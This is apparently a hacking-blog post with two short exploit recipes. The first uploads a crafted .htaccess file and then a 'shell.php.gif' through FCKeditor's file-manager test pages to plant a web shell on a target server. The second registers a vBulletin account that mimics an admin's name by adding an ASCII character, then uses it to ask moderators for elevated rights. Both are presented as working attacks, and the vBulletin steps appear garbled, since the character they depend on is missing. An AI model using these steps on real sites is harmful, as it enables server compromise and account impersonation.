Bypass all versions FCKeditor with htaccess and gain shell
Bypass all versions FCKeditor with htaccess
1.create a htaccess file (.htaccess):
[cc lang="php"]
SetHandler application/x-httpd-php
2.Now upload this htaccess with FCKeditor.
[cc lang="html"]http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t
est.html[/cc]
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to
"shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.
Credit : pentest lab
Source
vBulletin – Registration Bypass Vulnerability
1. Check the names of the admins/moderators on the forums
2. Go to Http://[localhost]/path/register.php
3. [cc lang="html"]Type this at User Name ===> ADMIN_username[/cc]
4. [cc lang="html"] is an ASCII Code[/cc]
5. complete the other parameters
6. Then click on Complete Registration
7. Now you see that your user name like admin user name
8. PM the moderators to elevate your account or promote another user. (or other nutty things)
(this is old but its still working)
Author: Immortal Boy
Iranian Datacoders Security Team
